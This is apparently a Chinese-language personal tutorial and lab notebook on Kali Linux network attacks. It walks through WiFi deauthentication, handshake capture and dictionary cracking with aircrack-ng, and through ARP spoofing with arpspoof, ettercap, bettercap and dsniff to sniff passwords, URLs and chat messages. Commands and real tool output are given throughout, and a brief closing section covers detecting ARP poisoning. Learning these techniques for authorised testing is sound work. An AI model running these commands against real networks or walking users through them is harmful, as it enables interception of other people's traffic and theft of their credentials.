玩转kali内网渗透篇

玩转kali内网渗透篇

科普知识

M1 S50 国内最为常见，被称IC卡，食堂卡
M1 UID 根据M1S50做的变种卡，与M1 S50一样，但是卡0扇区可以修改。因此UID可以修改，被称中国魔术卡
UID---->>FUID(一生只能修改一次)---->>CUID（能修改多次，有奇偶校验）
ID 卡 是俗称全名


T5577可以变身为ID卡也可以变为HID卡


现场嗅探：需要PM3的天线模拟射频卡获取密钥
Proxmark3 Easy GUI
一键自动解析


低功耗蓝牙术语及概念


Zigbee  低速但是传播广泛。会引起窃听攻击，序列攻击，密钥攻击
可以使用killerbee工具套件实施无限的攻击，也可以使用zbgoodfind，goodFET来实施物理攻击


无线蜂窝电话通讯协议
2G/3G/4G/5G


伪基站（太敏感？？）


SDR#1.0.0.1361
查看频率峰值FM


使用hackrf欺骗GPS信号


gps-sdr-sim


-e 选择的通讯方式（）


WPA加密 ：四种认证方式
WPA、WPA2、WPA-PSK、WPA2-PSK


彩虹表跑企业级的那些密码，家用的可以生成当地手机号+出生日期


kali有自带的字典 
cd/usr/share/wordlists/


kali破解工具
aircrack
wifiite
reaver
fern wifi crack
fluxion
hijacker

aircrack-ng破解密码

service network-manager restart(重启网络)
ifconfig wlan0 up   (启动无线网卡)
airmon-ng start wlan0(监听模式)
airodump-ng wlan0mon（显示附近WIFI）
airodump-ng -c 1 -w 123 --bssid xx:xx:xx:xx:xx wlan0mon(显示链接WIFI的客户端)   //-c可以不用选，自动判断频道 -w 代表写入 （123-01.cap）  这个后台别关！！！！！！！！！攻击掉线后会出现握手包，以前我就有试过

aireplay-ng wlan0mon(做坏事，踢掉别人的网络)//deauth洪水攻击，没有防止踢掉线的

aireplay-ng --deauth 2  -a 无线路由器AP(bssid) -c 连接路由器AP wlan0mon

手机掉了已经连不上wifi但是bssid还存在

aircrack-ng a2 -b FC:D7:33:D7:5E:72 -w /root/桌面/ALL/tools/dictory/密码/弱口令.txt -test-01.cap

(成功，很简单，当初为什么不找点找到这个网站http://www.shiyanbar.com/course-video/watchVideo/cid/462/vid/2170)

这里注意不能破解wpa2的密码  今天刚试过

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              
                                                                                                        
 54:36:9B:1C:A0:FB  34:78:D7:1B:8A:5E  -80    0e- 0e   875     5210                                      
 54:36:9B:1C:A0:FB  04:56:04:30:E2:85  -80    0e- 0e   636   107186                                      




















 CH  5 ][ Elapsed: 4 mins ][ 2018-02-12 16:17                                         
                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                       
 54:36:9B:1C:A0:FB  -60 100     1738   111663  655   5  54e  WPA2 CCMP   PSK  YYYYYY                   
                                                                                                       
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             
                                                                                                       
 54:36:9B:1C:A0:FB  34:78:D7:1B:8A:5E  -78    0e- 1    875     5213                                     
 54:36:9B:1C:A0:FB  04:56:04:30:E2:85  -74    0e- 1e   728   107422                                     




















 CH  5 ][ Elapsed: 8 mins ][ 2018-02-12 16:20 ][ WPA handshake: 54:36:9B:1C:A0:FB                     
                                                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                      
 54:36:9B:1C:A0:FB  -60  78     3366   177909  801   5  54e  WPA2 CCMP   PSK  YYYYYY                  
                                                                                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                            
                                                                                                      
 54:36:9B:1C:A0:FB  04:56:04:30:E2:85  -76    0e- 1e   105   173437                                    
 54:36:9B:1C:A0:FB  34:78:D7:1B:8A:5E  -78    0e- 1      1     7373                                    

root@kali2:~# aircrack-ng -w /root/桌面/ALL/tools/dictory/密码/400W常用密码整理.txt YYYYY-01.cap Opening YYYYY-01.cap
Read 313972 packets.

   #  BSSID              ESSID                     Encryption

   1  54:36:9B:1C:A0:FB  YYYYYY                    WPA (1 handshake)

Choosing first network as target.

Opening YYYYY-01.cap
Reading packets, please wait...







                                 Aircrack-ng 1.2 rc4

      [01:02:42] 1989596/2202071 keys tested (610.47 k/s) 

      Time left: 0 seconds                                      90.35%

                       Current passphrase: 43219999                   


      Master Key     : CB 8D 70 17 6A 73 5E 29 AF 0C 44 0D 5E CE E9 0C 
                       52 D8 18 E4 C4 7A EE F4 A7 F5 64 7A 54 9D 4E EA 

      Transient Key  : 70 41 5C 3B A7 76 D1 EE 66 34 9E 98 2B A2 0E ED 
                       44 95 3B 9D BE 3A 47 9E 61 DE 58 68 3A 96 EC E3 
                       BE 35 AC 4E 1D A6 D3 2D B2 1E D0 3A 6D 9C 54 EF 
                       41 F0 11 C9 8F 17 98 7F 7E 84 36 38 90 C0 14 66 

      EAPOL HMAC     : C1 C5 2C 85 02 8B A0 59 55 5D 58 EB BA 31 BF CF 

Passphrase not in dictionary

ARP欺骗

｛
先选择网卡，主动转发，让目标可以上网
ARP欺骗设置
不管访问什么页面都显示“haha0”

｝
｛
bettercap
bettercap -x扫描局域网的主机
显示 局域网内账号密码验证码
bettercap --kill -X 

｝

我自己的实战

了解自己kali的ip是啥？

eth0、inet6、ether、lo
root@kali:~# ifconfig
eth0: flags=4099  mtu 1500
        ether *************  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1  (Local Loopback)
        RX packets 20  bytes 1116 (1.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20  bytes 1116 (1.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


wlan0: flags=4163  mtu 1500
        inet 192.168.0.104  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 **************  prefixlen 64  scopeid 0x20
        ether 00:13:ef:b0:10:14  txqueuelen 1000  (Ethernet)
        RX packets 39  bytes 4169 (4.0 KiB)
        RX errors 0  dropped 8  overruns 0  frame 0
        TX packets 17  bytes 2566 (2.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

（以上为kali虚拟机）

无线局域网适配器 WLAN:


 

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : ****************
   IPv4 地址 . . . . . . . . . . . . : 192.168.0.102
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : **********
                                       192.168.0.1

（以上为本机地址）


我们需要启用IP转发，输入下面命令（PS:利用Linux主机的路由功能）：

root@bt:~# cat /proc/sys/net/ipv4/ip_forward
0
root@bt:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1

下面的攻击我使用ARPspoof，来演示ARPspoofing攻击。这是一个不错的开源工具，可以用来执行ARP欺骗攻击

root@kali:~# arpspoof -h（可以查看arpspoof版本）
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

下面的命令是利用ARP毒化，重定向受害者的流量传送给攻击者。

root@bt:~# arpspoof -i eth0 -t 192.168.0.1 127.0.0.1

这里受害者的流量ip总是不对，没有进行下去
懂了  这里说的是  要与被欺骗主机不同网段，我换成桥接试试（桥接就断网）

换无线网卡试试
你的虚拟机kali是用的主机win7的地址，所以不能攻击。
如果是win7用无线网连接的话你可以单独用usb网卡连接kali
之后win7和kali是不同网卡同网段了，就可以相互进行arp欺骗


arpspoof -i wlan0 -t 192.168.0.102 192.168.0.1成功执行！！！！！！！！！
arpspoof -i wlan0 -t 192.168.0.1 192.168.0.104
｛
arpspoof -h出来的结果我感觉是这么解读的-t 指定arp毒化数据发往的目标IP，host就是本机要仿冒的IP地址，比如，执行:
arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1
的作用是告诉101，我这里是网关，你的数据交给我转发，然后，
arpspoof -i wlan0 -t 192.168.1.11 192.168.1.101
的作用是告诉真正的网关，我这里是101，101的数据交给我就对了
再结合之前的ip_forward转发就对了
只是个人想法，找了好多也没找到一个解释它的用法的
｝


arpspoof -i eth0 -t 【被攻击IP】 【网关IP】
arpspoof -i eth0 -t 【网关IP】 【被攻击IP】 
两个都要执行。
命令解释arpspoof -i eth0 -t IP1 IP2
欺骗ip2,告诉IP2你的计算机IP是IP1.
这样分析一下，你就理解ARP欺骗了


root@bt:~# driftnet -i eth0   //下面的没做实验，因为上一步就断了




通过使用Ettercap来进行ARP欺骗 
Ettercap是一个多用途的开源工具，可以用来执行嗅探、主机分析等。在本教程中，我们使用中间人攻击进行ARP欺骗，ettercap有些不错的插件，可以增强中间人攻击。Ettercap中最重要的插件如下:


dns_spoof (执行DNS欺骗攻击)
Dos_attack(对受害主机进行拒绝服务攻击)
Chk_poison(检测是否成功进行了攻击)
Repoison_arp(顾名思义，修复ARP)

Ettercap

-t 只监听这种协议
-T ettercap检查pcap文件（脱机监听）
-q 安静（不回显）
-M 这是一个重要的参数，他会告诉ettercap执行中间人攻击，使用这个参数很简单，如 -M method


Ettercap -T -q -M ARP//

Dsniff&ARP欺骗攻击

Dsniff是一个非常强大的工具套件，它被用来进行渗透测试。它被用来实施嗅探、网络分析等。它能够捕捉各种协议。ARPspoof和driftnet也是dsniff套件的一部分，当然还有其他套件，如：


Msgsnarf
Urlsnarf
Mailsnarf
Filesnarf
dnsspoof
在如下攻击场景中：


攻击者IP： 192.168.1.12
被攻击主机IP:192.168.1.6
路由(网关)IP：192.168.1.1
让我们开始进行ARPspoof IP转发攻击：

root@bt:~# echo 1 >> /proc/sys/net/ipv4/ip_forwardroot@bt:~# arpspoof -i eth0 -t 192.168.1.6 192.168.1.1root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12
我刚刚启用端口转发，之后使用arpspoof（dsniff的一个插件）来执行ARP毒化攻击。开启dsniff来捕获已知协议获取密码。


root@bt:~# dsniff -i eth0dsniff: listening on eth0

如图所示，dsniff成功从受害者主机上捕获了FTP的用户名和密码，尽管这个密码是不正确的，但dsniff可以捕获受害者发送的信息。 
因为攻击者的主机作为了默认的路由器（因为进行了ARP欺骗），因此受害主机传输的数据经过攻击者，攻击者很容易可以嗅探到受害者发送的信息。我们可以arpspoof所有网段内的主机，但我们的示例中只ARP欺骗了单个主机。你可以试试其他的dsniif工具，像urlsnarf。

root@bt:~# urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

它能捕获受害者访问网站的详细信息。你可以试试msgsnarf捕获即时聊天会话信息，我的意思是如果用户通过雅虎聊天或者任何IRC频道，通过msgsnarf可以捕获受害者所有的谈话，结束攻击需要结束arpspoof。

root@bt:~# killall arpspoof

如何防止ARP毒化攻击

ARP欺骗是一种非常危险的攻击，攻击者可以很容易的探取受害者主机证书和其他机密信息。因此如何发现且保护ARP毒化受害者攻击呢？其实这是很容易识别的，如果你是受害主机，可以使用ARP命令查看。

正如我们可以对上面所讨论IP地址被ARP欺骗攻击之前和之后的区别进行比较，能够验证你是否是受害者。其他的方法是设置ARP缓存表为静态，但不推荐。因为在一个大型的网络中，它要花费很长的时间手动设置，这是不可能的。

这里有很多工具可以用来帮助你判断是否受到了ARP欺骗，而且有几种工具是可用的，它可以保护你的计算机免受ARP毒化并且检测出ARP缓存表的更变，一些比较出名的工具：

ARPon
ARP Wath
XARP

后续添加msfconsole内容....